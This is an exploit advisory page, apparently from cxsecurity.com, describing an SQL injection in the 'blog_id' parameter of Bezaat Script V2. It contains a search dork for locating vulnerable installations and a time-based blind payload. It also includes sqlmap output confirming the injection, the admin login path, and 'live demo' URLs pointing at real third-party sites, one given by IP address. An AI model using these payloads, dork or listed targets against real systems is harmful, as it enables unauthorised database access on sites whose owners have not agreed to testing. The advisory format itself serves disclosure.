Bezaat Script V2 SQL Injection Vulnerability

2016.09.15
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

###################### # Exploit Title : Bezaat Script V2 SQL Injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : Powed by Greenit Egypt for Information Technology # Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1 # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 15/09/2016 # video Proof : https://youtu.be/psHqU3Ldo5Q ###################### # [★] DESCRIPTION : ###################### # [+] Bezaat Script It's An Commerce Script # [+] That Allow you To Add and Menage ads in your Website # [+] AND an SQL Injection has been Detected in his Script Version 2 # [+] The Other Version Maybe Also infected ###################### # [★] Poc : ###################### # When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors # http://127.0.0.1/blog/blog.php?blog_id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/blog/blog.php?blog_id=1' ###################### # [★] SQLmap PoC: ###################### # Parameter: blog_id (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: blog_id=1 AND SLEEP(5) #--- #[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable #[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' #[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found #[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' #[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive # # GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [★] Live Demo : ###################### # http://al3ta.com/blog/blog.php?blog_id=1 # http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4 ###################### # [★] Admin Dashboard : ###################### # http://127.0.0.1/admin/adminlogin.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/psHqU3Ldo5Q


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top